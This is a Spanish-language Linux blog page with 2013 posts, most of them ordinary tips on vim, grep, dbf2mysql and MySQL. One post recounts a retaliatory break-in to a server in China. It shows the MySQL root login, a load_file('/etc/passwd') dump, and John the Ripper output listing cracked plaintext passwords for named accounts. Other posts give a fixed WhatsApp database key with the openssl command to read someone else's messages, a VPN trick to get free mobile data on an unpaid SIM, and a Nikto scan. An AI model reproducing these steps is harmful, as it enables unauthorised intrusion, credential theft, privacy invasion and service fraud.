Villatux Blog <--

Internet gratis!! con Telcel y Movistar (con banda ancha USB)

2013-05-13T18:21:00.003-06:00

La configuración aquí mostrada fué realizada en Ubuntu-Linux 13.04 , pero debe funcionar en cualquier distro linux.

NOTA:
* Necesitas poner un chip que no tenga saldo para la conexión
* Si tu USB viene con un chip , cámbialo por uno de cualquier celular, para que no te gaste el saldo que tienes, o si no tienes saldo pues úsala xDD

ASEGURARNOS QUE DETECTA BIÉN LA USB

* La insertamos y esperamos a que la detecte la computadora. lo sabemos al dar clic en las redes inalambricas por que dirá :"Banda ancha movil"
* Damos clic ahi para seguir los pasos que nos indica:
- Lugar
- Compañia de telefonía celular

COMPROBAR
Ya que la detecta correctamente podemos probar, al abrir nuestro navegador web (en mi caso Firefox) y buscar cualquier pagina ej. www.google.com.mx esto nos redireccionará a una pagina en donde nos dice que no tenemos saldo para navegar en internet y que paguemos para hacerlo :p

REGISTARNOS EN

https://www.hotsplots.de/en/register.html

Despues de registrarnos y confirmar el correo que nos llegó a la bandeja de entrada de nuestro correo, podemos ingresar a la pagina con nuestra cuenta:

Ya cuando estemos logeados con nuestra cuenta, podemos ingresar al siguiente enlace :

https://www.hotsplots.de/en/my-hotsplots/my-userdata/openvpn-key.html

de donde descargaremos los archivos necesarios para conectarnos a la vpn gratuita con nuestra cuenta que acabamos de crear. (Bbajamos la version para UNIX/Linux):

REALIZAR LA CONEXIÓN A LA VPN DESDE TERMINAL

Abrimos la terminal de sistema y nos situamos en el directorio donde descargamos el archivo .tar como superusuario:

villatux#cd /home/villatux/

Descomprimimos:

villatux#tar -xvf openvpn_key.tar

Nos situamos en el directorio de las configuraciones de la VPN:

villatux#cd openvpn_key

Instalamos openvpn si es que no lo tenemos :

villatux# apt-get install openvpn

Ejecutamos openvpn para que lea las configuraciones que descargamos:

villatux# openvpn hotsplots.conf

y veremos algo como esto:

villatux# openvpn hotsplots.conf
Mon May 13 17:33:40 2013 OpenVPN 2.2.1 x86_64-linux-gnu [SSL] [LZO2] [EPOLL] [PKCS11] [eurephia] [MH] [PF_INET6] [IPv6 payload 20110424-2 (2.2RC2)] built on Feb 13 2013
Mon May 13 17:33:40 2013 IMPORTANT: OpenVPN's default port number is now 1194, based on an official port number assignment by IANA. OpenVPN 2.0-beta16 and earlier used 5000 as the default port.
Mon May 13 17:33:40 2013 NOTE: OpenVPN 2.1 requires '--script-security 2' or higher to call user-defined scripts or executables
Mon May 13 17:33:40 2013 Control Channel MTU parms [ L:1545 D:138 EF:38 EB:0 ET:0 EL:0 ]
Mon May 13 17:33:40 2013 RESOLVE: NOTE: vpn.hotsplots.net resolves to 5 addresses
Mon May 13 17:33:40 2013 Data Channel MTU parms [ L:1545 D:1300 EF:45 EB:4 ET:0 EL:0 ]
Mon May 13 17:33:40 2013 Fragmentation MTU parms [ L:1545 D:1300 EF:45 EB:4 ET:0 EL:0 ]
Mon May 13 17:33:40 2013 Local Options hash (VER=V4): '35ec189c'
Mon May 13 17:33:40 2013 Expected Remote Options hash (VER=V4): '9b1c411c'
Mon May 13 17:33:40 2013 UDPv4 link local (bound): [undef]
Mon May 13 17:33:40 2013 UDPv4 link remote: [AF_INET]46.228.204.146:1194
Mon May 13 17:33:41 2013 VERIFY OK: depth=1, /C=DE/ST=Berlin/L=Berlin/O=hotsplots_GmbH/OU=certificate_authority/CN=www.hotsplots.de/emailAddress=ca@hotsplots.de
Mon May 13 17:33:41 2013 VERIFY OK: nsCertType=SERVER
Mon May 13 17:33:41 2013 VERIFY OK: depth=0, /C=DE/O=hotsplots_GmbH/OU=Gateway_Server/CN=VPN1
Mon May 13 17:33:44 2013 Data Channel Encrypt: Cipher 'BF-CBC' initialized with 128 bit key
Mon May 13 17:33:44 2013 Data Channel Encrypt: Using 160 bit message hash 'SHA1' for HMAC authentication
Mon May 13 17:33:44 2013 Data Channel Decrypt: Cipher 'BF-CBC' initialized with 128 bit key
Mon May 13 17:33:44 2013 Data Channel Decrypt: Using 160 bit message hash 'SHA1' for HMAC authentication
Mon May 13 17:33:44 2013 Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA, 1024 bit RSA
Mon May 13 17:33:44 2013 [VPN1] Peer Connection Initiated with [AF_INET]46.228.204.146:1194
Mon May 13 17:33:46 2013 TUN/TAP device tun0 opened
Mon May 13 17:33:46 2013 do_ifconfig, tt->ipv6=0, tt->did_ifconfig_ipv6_setup=0
Mon May 13 17:33:46 2013 /sbin/ifconfig tun0 10.44.40.194 pointopoint 10.44.40.193 mtu 1500
Mon May 13 17:33:46 2013 Initialization Sequence Completed

Hasta donde dice " Initialization Sequence Completed" nos indica que la conexión fué realizada con éxito. y ahora a navegar , que para eso es el internet xDD

Cambiar codificación de ficheros con VI > VIM

2013-05-10T10:52:00.001-06:00

Una vez que el archivo se encuentra abierto con VIM y suponiendo que el archivo esta codificado con iso-8859-1 (latin1) se debe teclear en el modo comandos la siguiente línea.

    :set fenc=utf-8

Si el archivo esta codificado con utf-8 y se desea pasar a iso-8859-1 se debe escribir la siguiente línea.

    :set fenc=iso-8859-1

Nota: No deben existir espacios entre fenc, el igual y el tipo de codificación que se utilizará.

Este comando solo permitirá cambiar la codificación del archivo que se encuentra abierto, sin embargo puede ser necesario editar la codificación de varios archivos para lo cual se puede ejecutar el siguiente comando en la consola de linux.

    find -name '*.php' -exec vim {} '+set fenc=utf-8' '+x' \;
find -name '*.php' permite buscar uno o más archivos dentro del directorio y de los directorios que se encuentran en su interior que coinciden con el parámetro de búsqueda.
-exec permite ejecutar un comando sobre los archivos que son encontrados.
vim {} '+set fenc=utf-8' permite cambiar la codificación de los archivos que coinciden con la búsqueda realizada.

Importar Archivos .DBF a MySQL con dbf2mysql

2013-05-06T15:24:00.000-06:00

Recientemente me interesé en consultar algunos datos de algunas personas por X motivos, el problema es que estos datos estaban en una base de datos de FoxPro .DBF y ya estaba integrada a un software para windows. Esto no es para mi nada grato ya que no tengo windows instalado en mis computadoras.

Para poder ver mis datos hice la importación a mysql y con ello hacer sencillas consultas SQL o también hacer una interfaz web para las consultas.

En esta ocasión utilicé el software "dbf2mysql" disponible en la lista de repositorios de ubuntu, y lo instalas super sencillo:

1) Instalar dbf2mysql:

sudo apt-get install dbf2mysql

Las banderas más importantes de dbf2mysql són los siguientes:

    -h indica el servidor a donde conectarse
    -U usuario MySQL
    -P password MySQL
    -d base de datos donde se insertaran los datos
    -t tabla donde se insertarán los datos
    -c crea la tabla si no existe
    -cc crea la tabla, pero no inserta registros
    -f traduce los nombres de campo a minúsculas
    -n no se agrega ‘NOT NULL’ en las sentencias de creación de tabla
    -o exporta solo los campos listados (Ej. -o field1,field2…)
    -s substituye permite cambiar nombres de campos (Ej. -s oldName1=newName1,oldName1=newName1)
    -i lista de campos a indexar. Genera UN indice por campo (Ej. -i field1,field2…)
    -r quita espacios antes y después de datos alfanuméricos
    -v muestra detalles de la conversión
    -vv muestra más detalles
    -vvv incluye informe de progreso

ya teniendo instalado el programa, y sabiendo como se utiliza manos a la obra:

2) Creo una base de datos MySQL vacia:

mysql -u [DBUSER] -p -e "CREATE DATABASE `[DBNAME]`"

3) Por último lanzamos el siguiente comando para indicarle que importe el archivo dbf a la base de datos local, en la tabla [DBTABLE] de la base de datos [DBNAME], entrando con el usuario [DBUSER] y el password [DBPASS]. Mediante el flag -c forzamos a que cree la tabla si no existe y con -f le indicamos que traduzca los nombres de los campos a minusculas:

dbf2mysql -h localhost -U [DBUSER] -P [DBPASS] -d [DBNAME] -t [DBTABLE] -c -f /home/villatux/miarchivo.dbf

Esta importación no tendra en cuenta algunos atributos importantes de la tabla como, por ejemplo, los campos autoincrementales.

Si tenemos algun problema de este tipo, es recomendable crear la estructura de la tabla antes de realizar la importación.

De victima a verdugo (de atacado a atacante xDD)

2013-05-03T10:21:00.000-06:00

La semana pasada revisando las bitácoras de mi servidor encontré que desde hace al menos 2 meses (lo digo por que no guardo más de dos meses de bitácoras) están tratando de acceder a mi servidor por ssh con bruteforce. Confieso que esto me alertó un poco y por lo cual me dedique esa tarde exclusivamente a investigar el hecho.

Empecé a hacer análisis básicos de puertos con nmap, y luego sabiendo los puertos que tenia abiertos, me puse a probar algunos exploits que iban dirigidos a ellos. Con este análisis saqué la deducción de los sistemas que manejaba el servidor , como lo son un servidor web, la ubicación es en China, servicios de base de datos Oracle y algunos detalles, dentro de los cuales estaba abierto el puerto default de MySQL

Al segundo día (que tuve tiempo por el trabajo y la escuela) obtube acceso a MySQL del servidor.

Ya en el servidor solo me bastó ejecutar algunos comandos de mysql para obtener los passwords encriptados del servidor para empezar a crackearlo.

Aquí la odisea (ya cuando obtuve acceso por MySQL):

villatux# mysql -h 58.248.3X.XXX -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 16817
Server version: 5.0.22-standard

Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> pager cat
PAGER set to 'cat'
mysql> select load_file('/etc/passwd');
root:x:0:0:root:/root:/bin/bash
roo:x:0:0::/tmp:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
oracledb:x:593:594::/home/wasadmin:/bin/bash
bpcard:x:501:500:bpcard:/home/bpcard:/bin/ksh
bpposp:x:502:500:bpposp:/home/bpposp:/bin/ksh
ccbfca:x:503:501:ccbfca:/home/ccbfca:/bin/ksh
ccbcomm:x:504:501:ccbcomm:/home/ccbcomm:/bin/ksh
informix:x:505:505:informix:/home/informix:/bin/ksh
oracle:x:506:514:oracle:/home/db/oracle:/bin/ksh
svnroot:x:507:507::/home/svnroot:/bin/bash
exchange:x:508:500::/home/exchange:/bin/ksh
bonus:x:509:509::/home/bonus:/bin/ksh
topbpas:x:510:508::/home/topbpas:/bin/ksh
fcs:x:511:511::/home/fcs:/bin/ksh
wasadmin:x:515:516::/home/wasadmin:/bin/bash
weblogic:x:516:517::/home/weblogic:/bin/bash
icf:x:517:518::/home/icf:/bin/bash
comm:x:518:519::/home/comm:/bin/bash
topbpastrans:x:519:508::/home/topbpas/topbpastrans:/bin/ksh
topbpasrules:x:520:521::/home/topbpas/topbpasrules:/bin/ksh
topbpasbatch:x:521:522::/home/topbpas/topbpasbatch:/bin/ksh
zhangsan:x:523:514::/home/zhangsan:/bin/bash
bashtest:x:524:525::/home/bashtest:/bin/ksh
db2inst1:x:533:534::/home/db2inst1:/bin/ksh
db2fenc1:x:534:535::/home/db2fenc1:/bin/ksh
emall:x:535:534::/home/emall:/bin/ksh
bppospb:x:536:536::/home/bppospb:/bin/ksh
cmcenter:x:537:534::/home/cmcenter:/bin/bash
dora:x:538:538::/home/dora:/bin/bash
mysql:x:101:104:MySQL server:/var/lib/mysql:/bin/bash
intern01:x:539:540::/home/intern01:/bin/bash
intern02:x:540:541::/home/intern02:/bin/bash
intern03:x:541:542::/home/intern03:/bin/bash
intern04:x:542:543::/home/intern04:/bin/bash
intern05:x:543:544::/home/intern05:/bin/bash
intern06:x:544:545::/home/intern06:/bin/bash
intern07:x:545:546::/home/intern07:/bin/bash
intern08:x:546:547::/home/intern08:/bin/bash
intern09:x:547:548::/home/intern09:/bin/bash
intern10:x:548:549::/home/intern10:/bin/bash
intern11:x:549:550::/home/intern11:/bin/bash
intern12:x:550:551::/home/intern12:/bin/bash
intern13:x:551:552::/home/intern13:/bin/bash
intern14:x:552:553::/home/intern14:/bin/bash
intern15:x:553:554::/home/intern15:/bin/bash
intern16:x:554:555::/home/intern16:/bin/bash
intern17:x:555:556::/home/intern17:/bin/bash
intern18:x:556:557::/home/intern18:/bin/bash
intern19:x:557:558::/home/intern19:/bin/bash
intern20:x:558:559::/home/intern20:/bin/bash
intern21:x:559:560::/home/intern21:/bin/bash
posp:x:560:561::/home/posp:/bin/ksh
batch:x:561:562::/home/batch:/bin/bash
trans:x:562:562::/home/trans:/bin/bash
rules:x:563:562::/home/rules:/bin/bash
htclient:x:564:564::/home/htclient:/bin/bash
train:x:565:565::/home/train:/bin/bash
tra:x:0:565::/home/train:/bin/bash
test_informix:x:566:505::/home/test_informix:/bin/ksh
traininguser:x:567:567::/home/traininguser:/bin/bash
ncup:x:568:568::/home/ncup:/bin/bash
topbpasprd:x:569:569::/home/topbpasprd:/bin/bash
jiraroot:x:570:570::/home/jiraroot:/bin/bash
mysqluser:x:571:571::/home/mysqluser:/bin/bash
db2inst2:x:572:572::/home/db2inst2:/bin/bash
payment:x:575:575::/home/payment:/bin/bash
dispute:x:577:577::/home/dispute:/bin/bash
nacp:x:578:578::/home/nacp:/bin/bash
cmcenter2:x:579:579::/home/cmcenter2:/bin/bash
cmcente2:x:580:580::/home/cmcente2:/bin/bash
wendeson:x:582:582::/home/wendeson:/bin/bash
malldb:x:583:583::/home/malldb:/bin/bash
toppay:x:584:584::/home/toppay:/bin/bash
portal:x:0:585::/home/portal:/bin/bash
tomcat:x:585:586::/home/tomcat:/bin/bash
efront:x:586:587::/home/efront:/bin/bash
ics:x:587:588::/home/ics:/bin/bash
hsmsoft:x:588:589::/home/hsmsoft:/bin/bash
dps:x:589:590::/home/dps:/bin/bash
tasskms:x:590:591::/home/tasskms:/bin/bash
topcbbs:x:591:592::/home/topcbbs:/bin/bash
showhow:x:592:593::/home/showhow:/bin/bash
+---------------------------------------------------+
1 row in set (0.56 sec)

mysql> quit
Bye
villatux#

Luego me copie el resultado del SELECT a mi maquina local y con esto empezar a destripar xDD:

villatux#john /home/villatux/shadow
Warning: only loading hashes of type "md5", but also saw type "des"
Use the "--format=des" option to force loading hashes of that type instead
Loaded 74 password hashes with 74 different salts (FreeBSD MD5 [32/64 X2])
Remaining 38 password hashes with 38 different salts
test_informix    (test_informix)
emall            (emall)
traininguser     (traininguser)
icf              (icf)
topbpasrules     (topbpasrules)
zhangsan         (zhangsan)
topbpasbatch     (topbpasbatch)
fcs              (fcs)
dps              (dps)
trans            (trans)
hsmsoft          (hsmsoft)
htclient         (htclient)
posp             (posp)
tasskms          (tasskms)
malldb           (malldb)
efront           (efront)
showhow          (showhow)
topbpastrans     (topbpastrans)
wendeson         (wendeson)
ncup123          (ncup)
jiraroot123      (jiraroot)
svnroot123       (svnroot)
ccbfca123        (ccbfca)
ccbcomm123       (ccbcomm)
mysqluser123     (mysqluser)
wasadmin123      (wasadmin)
ics123           (ics)
topbpras123       (topbpas)
123456           (dispute)
123456           (payment)
123456           (cmcenter)
123456           (cmcente2)
123456           (toppay)
123456           (nacp)
123456           (cmcenter2)
1qaz2wsx         (portal)
huatengscube123456789 (root)

Y tantan xDD
Con esto me copié algunos juguetes de los “Hackers” :

* Scripts para enviar spam (enviaban de los tipo xxx@domain.co.uk)
* Scripts para escaneo mundial de ips
* Scripts para mass defacing
* Software *NIX modificado (RootKit)
* y Algunas técnicas de espionaje interesantes hehe

Después de esto no ha cambiado nada, solo me aseguro de no sufrir intentos de acceso en mi servidor, aplicando algunas medidas para ello y el servidor aqui mostrado no ha sufrido algún cambio.

Escaneo de servidores web con Nikto

2013-04-30T10:03:00.002-06:00

Nikto es un escaner de servidores web que realiza tests de multiples instancias, incluyendo más de 6500 archivos potencialmente peligrosos como CGIs.

También checa versiones antiguas de servidores y comprueba problema tipicos de al rededor de 150 servidores web, y detecta versiones especificas de 270 servidores.

Comprueba la configuración de los servidores web, así como comprobar múltiples archivos index.

En general un excelente escaner de servidores web.

aquí un ejemplo de un escaneo con Nikto:

villatux# nikto -host www.ejemplo.com

- Nikto v2.1.4

---------------------------------------------------------------------------

+ Target IP: 66.7.197.XX

+ Target Hostname: www.ejemplo.com

+ Target Port: 80

+ Start Time: 2013-04-31 08:59:08

---------------------------------------------------------------------------

+ Server: nginx admin

+ robots.txt contains 1 entry which should be manually viewed.

+ OSVDB-637: Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users).

+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.

+ /cgi-sys/formmail.pl: Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.

+ /cgi-sys/guestbook.cgi: May allow attackers to execute commands as the web daemon.

+ /cgi-sys/Count.cgi: This may allow attackers to execute arbitrary commands on the server

+ OSVDB-3233: /mailman/listinfo: Mailman was found on the server.

+ OSVDB-3092: /cgi-sys/entropysearch.cgi?query=asdfasdf&user=root&basehref=%2F%2Fwww.yourdomain.com/: CPanel's Entropy Search allows username enumeration via the user parameter.

+ OSVDB-3092: /cgi-sys/FormMail-clone.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web

+ OSVDB-3092: /cgi-sys/scgiwrap: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web

+ OSVDB-3268: /img/: Directory indexing found.

+ OSVDB-3092: /img/: This might be interesting...

+ OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.

+ OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.

+ Server banner has changed from nginx admin to lighttpd/1.4.29, this may suggest a WAF or load balancer is in place

+ 6448 items checked: 80 error(s) and 14 item(s) reported on remote host

+ End Time: 2013-04-31 09:40:17 (2469 seconds)

---------------------------------------------------------------------------

+ 1 host(s) tested

Analisis forense a whatsapp (cracking msgstore.db.crypt)

2013-04-18T17:21:00.000-06:00

Los mensajes, contactos y configuraciones de Whatsapp se guardan en un archivo con formato de SQlLite. Anteriormente estos archivos estaban sin cifrar, esto hasta un tiempo atrás que con una actualización se cifraron estos archivos, Esto para evitar que cuando se te pierda o te roben el celular no puedan tener acceso a tus conversaciones.

Pero siempre hay como o el porqué buscarle para ver información (la que necesitamos) existen dos casos en donde podemos acceder a estas bases de datos:

Caso IOS: En este caso el archivo esta en el directorio:

"(ID de App)/Documents/ChatStorage.sqlite"

CASO ANDROID: En este caso el archivo está en :

/com.whatsapp/databases/msgstore.db.crypt

y existe otros archivos "backup" que se guardan en la tarjeta de memoria externa

DESCIFRADO
Estas bases de datos en SQLite estan cifradas en AES-192-ECB que a mi parecer si es un cifrado muy bueno, lo maló/bueno es que el cifrado a los archivos siempre lo hacen con una misma llave:

"346a23652a46392b4d73257c67317e352e3372482177652c"
en donde no incluye ningún factor único del celular, por lo que podemos acceder a los mensajes de cualquier celular de la misma forma en pocos segundos xDD

Para descifrar estos archivos necesitamos OpenSSL , en mi caso lo tengo ya instalado en mi Distro linux, tan solo especificando el archivo de entrada "-in" y el de salida "-out" podemos hacerlo con el siguiente comando:

openssl enc -d -aes-192-ecb -in msgstore.db.crypt -out msgstore.db.sqlite -K 346a23652a46392b4d73257c67317e352e3372482177652c
Una vez descifrado este archivo , podemos acceder mediante SQLite, en mi caso desde el shell de linux:

#apt-get install sqlite3              --> instalamos SQLite3

#sqlite3 msgstore.db.sqlite      --> Accedemos a la base de datos

sqlite> .databases          --> vemos las bases de datos
sqlite> .tables                 --> vemos las tablas
chat_list messages
sqlite> select * from messages; --> vemos los mensajes guardados

Y pues de esta forma podemos ver los mensajes de whatsapp aún y cuando se hayan borrado en la interfaz gráfica del celular.

Los creadores de Xtract (Fabio Sangiacomo and Martina Weidner) encontraron esto en Diciembre del 2011, sacaron su herramienta y un excelente documento explicando como la obtuvieron:

h**p://forum.xda-developers.com/showthread.php?p=24569917

h**ps://code.google.com/p/hotoloti/downloads/list
Aqui el documento con excelente explicación:

h**ps://www.os3.nl/_media/2011-2012/students/ssn_project_report.pdf
Espero les sirva este post como información importante que algún día pueden llegar a utilizar xDD

Establecer proxy para instalar paquetes con portage en Gentoo Linux

2013-04-17T10:47:00.000-06:00

Para utilizar emerge a travez de un proxy necesitas establecerlo con este comando:

#export http_proxy="http://username:password@proxy:8080"

Y para utilizar rsync también es necesario establecer el proxy

#export RSYNC_PROXY="http://username:password@proxy:8080"

En mi caso trabajo en una institución educativa y todo el trafico pasa a travez de proxy y estos tips me funcionan para configurarle el proxy a los servidores.

Espero les sea de utilidad.

UPDATE !  :

 actuzlizo el post para agregar otras formas de establecer proxy,  que nos facilitó : klondike
 
También se pueden añadir las variables (sin el export) en el make.conf deberías obtener el mismo resultado.

Por cierto, también es posible usar proxy para ftp con ftp_proxy

Backup de mysql cuando no se tiene el password

2013-04-15T10:21:00.000-06:00

¿Olvidaste o perdiste la contraseña del usuario 'root' de MySQL?, no hay problema, solo sigue estás sencillas instrucciones y podrás establecer una nueva. Claro siempre y cuando tengas acceso al usuario 'root' de Linux.

Detener el servidor

#> /etc/rc.d/init.d/mysqld stop

Iniciar en modo FULL o abierto

#> mysqld_safe --skip-grant-tables --skip-networking&

--skip-grant-tables esta opción causa que el servidor no use el sistema de privilegios lo que le da acceso ilimitado a todas las bases de datos a todos los usuarios de la base de datos.

Iniciar el monitor

#>mysql -u root

Como no hay sistema de privilegios en este momento, no se preguntara por la contraseña.

En este momento ya podemos manipular cualquier base de datos que esté en nuestro servidor con todos los privilegios.

Respaldar las bases de datos:

mysql> show databases;

+--------------------+
| Database           |
+--------------------+
| information_schema | 
| jaws_holafen       | 
| jaws_p108584       | 
| mysql              | 
| mysql_eo           | 
| mysql_ru           | 
| redesuni           | 
| test               | 
| webfcq             | 
| webfcq2            | 
| webfd              | 
+--------------------+

RESPALDAR: Ya que podemos ver los nombres de las bases de datos podemos empezar a respaldar cada base de datos:

mysqldump basededados > /home/usuario/backup.sql

O respaldar todas las bases de datos juntas:

mysqldump -A /home/usuario/backup_all.sql

la condición -A (“-all-databases”) selecciona todas las bases de datos existentes en el servidor.

Si nuestro caso , aparte de respaldar la base de datos es seguir usando el servidor, es necesario contar con la contraseña de root para mysql, como en este caso no la sabemos , la podemos cambiar de esta manera:

CAMBIAR LA CONTRASEÑA DE ROOT MYSQL

Usamos la base de datos del sistema mysql

mysql> use mysql;

Actualizamos el campo que cambiará la contraseña de 'root'

mysql> UPDATE user SET password=PASSWORD('nuevo_pass') WHERE user='root';
Query OK, 1 rows affected (0.07 sec)
Rows matched: 1  Changed: 1  Warnings: 0

mysql> exit
#>

Reiniciar el servidor y listo!!!

#> service mysqld restart

La siguiente vez que entrés al monitor (mysql -u root -p) usa la nueva clave o contraseña.

Comando grep en linux

2013-04-03T11:11:00.000-07:00

El comando grep nos permite buscar, dentro de los archivos, las líneas que concuerdan con un patrón. Bueno, si no especificamos ningún nombre de archivo, tomará la entrada estándar, con lo que podemos encadenarlo con otros filtros.

Por defecto, grep imprime las líneas encontradas en la salida estándar. Es decir, que podemos verlo directamente la pantalla, o redireccionar la salida estándar a un archivo.

Como tiene muchísimas opciones, vamos a ver tan sólo las más usadas:

-c En lugar de imprimir las líneas que coinciden, muestra el número de líneas que coinciden.
-e PATRON nos permite especificar varios patrones de búsqueda o proteger aquellos patrones de búsqueda que comienzan con el signo -.
-r busca recursivamente dentro de todos los subdirectorios del directorio actual.
-v nos muestra las líneas que no coinciden con el patrón buscado.
-i ignora la distinción entre mayúsculas y minúsculas.
-n Numera las líneas en la salida.
-E nos permite usar expresiones regulares. Equivalente a usar egrep.
-o le indica a grep que nos muestre sólo la parte de la línea que coincide con el patrón.
-f ARCHIVO extrae los patrones del archivo que especifiquemos. Los patrones del archivo deben ir uno por línea.
-H nos imprime el nombre del archivo con cada coincidencia.

Veamos algunos ejemplos:

- Buscar todas las líneas que contengan palabras que comiencen por a en un archivo:
$ grep '\' archivo

Otra forma de buscar, sería:
$ cat archivo | grep "\"

- Mostrar por pantalla, las líneas que contienen comentarios en el archivo /boot/grub/menu.lst:
$ grep "#" /boot/grub/menu.lst

- Enviar a un fichero las líneas del archivo /boot/grub/menu.lst que no son comentarios:
$ grep -v "#" /boot/grub/menu.lst

- Contar el número de interfaces de red que tenemos definidos en el fichero /etc/network/interfaces:
$ grep -c "iface" /etc/network/interfaces

- Mostrar las líneas de un fichero que contienen la palabra BADAJOZ o HUELVA:
$ grep -e "BADAJOZ" -e "HUELVA" archivo

- Mostrar las líneas de un fichero que contienen la palabra BADAJOZ o HUELVA, numerando las líneas de salida:
$ grep -n -e "BADAJOZ" -e "HUELVA" archivo

- Mostrar los ficheros que contienen la palabra TOLEDO en el directorio actual y todos sus subdirectorios:
$ grep -r "TOLEDO" *

Veamos algunos ejemplos con expresiones regulares:

- Obtener la dirección MAC de la interfaz de red eth0 de nuestra máquina:
$ ifconfig eth0 | grep -oiE '([0-9A-F]{2}:){5}[0-9A-F]{2}'

Sacamos la dirección MAC de la interfaz eth0 de nuestra máquina haciendo un:
ifconfig eth0

Y aplicando el filtro grep:
grep -oiE '([0-9A-F]{2}:){5}[0-9A-F]{2}'

Las opciones que he usado en grep son:

-o Indica que la salida del comando debe contener sólo el texto que coincide con el patrón, en lugar de toda la línea, como es lo habitual.
-i Lo he usado para que ignore la distinción entre mayúsculas y minúsculas.
-E Indica que vamos a usar una expresión regular extendida.

En cuanto a la expresión regular, podemos dividirla en dos partes:
([0-9A-F]{2}:){5} Buscamos 5 conjuntos de 2 carateres seguidos de dos puntos
[0-9A-F]{2} seguido por un conjunto de dos caracteres.

Como las direcciones MAC se representan en hexadecimal, los caracteres que buscamos son los números del 0 al 9 y las letras desde la A a la F.

- Extraer la lista de direcciones de correo electrónico de un archivo:
grep -Eio '[a-z0-9._-]+@[a-z0-9.-]+[a-z]{2,4}' fichero.txt

Utilizo las mismas opciones que en el caso anterior:

-o Indica que la salida del comando debe contener sólo el texto que coincide con el patrón, en lugar de toda la línea, como es lo habitual.
-i Lo he usado para que ignore la distinción entre mayúsculas y minúsculas.
-E Indica que vamos a usar una expresión regular extendida.

Analicemos ahora la expresión regular:
[a-z0-9._-]+@[a-z0-9.-]+[a-z]{2,4}

Al igual que antes, la vamos dividiendo en partes:
[a-z0-9._-]+ Una combinación de letras, números, y/o los símbolos . _ y - de uno o más caracteres
@ seguido de una arroba
[a-z0-9.-]+ seguido de una cadena de letras, números y/o los símbolos . y -
[a-z]{2,4} seguido de una cadena de entre dos y cuatro caracteres.

- Obtener la dirección IP de la interfaz de red eth1 de nuestra máquina:
$ ifconfig eth1 | grep -oiE '([0-9]{1,3}\.){3}[0-9]{1,3}' | grep -v 255

En el ejemplo anterior, hemos tomado la información que nos ofrece ifconfig:
ifconfig eth1

Hemos filtrado dicha información con el comando grep, obteniendo todas las direcciones IP que aparecen:
grep -oiE '([0-9]{1,3}\.){3}[0-9]{1,3}'

Por último, hemos filtrado la salida del comando anterior, para eliminar la dirección de broadcast junto con la máscara de red para quedarnos sólo con la dirección IP de la máquina:
grep -v 255

La línea anterior no mostraría las líneas que no contengan el valor 255, es decir, las direcciones de broadcast y máscara de red.

Analicemos ahora el comando grep:
grep -oiE '([0-9]{1,3}\.){3}[0-9]{1,3}'

Al igual que en los otros dos ejemplos de expresiones regulares uso las opciones -oiE en el comando grep:

-o Indica que la salida del comando debe contener sólo el texto que coincide con el patrón, en lugar de toda la línea, como es lo habitual.
-i Lo he usado para que ignore la distinción entre mayúsculas y minúsculas.
-E Indica que vamos a usar una expresión regular extendida.

En cuanto a la expresión regular:
'([0-9]{1,3}\.){3}[0-9]{1,3}'
([0-9]{1,3}\.){3} Representa 3 bloques de entre uno y tres dígitos separados por puntos. Observemos que como el punto es un metacaracter, tengo que usar el caracter de escape \ para que no sea interpretado como un metacaracter, sino como un caracter normal.
[0-9]{1,3} Representa el último bloque de la dirección IP, que está formado por un número de entre 1 y 3 dígitos.

FUENTE: http://enavas.blogspot.mx/2008/04/el-shell-de-linux-comando-grep.html

Convertir de de PosgreSQL a MySQL con pg2mysql

2013-02-22T10:48:00.002-07:00

Les paso un buen dato para convertir bases de datos que están en PostgreSQL a MySQL de manera simple:

es por medio de pg2mysql , una aplicación online para convertir de manera gratuita tus scripts SQL,

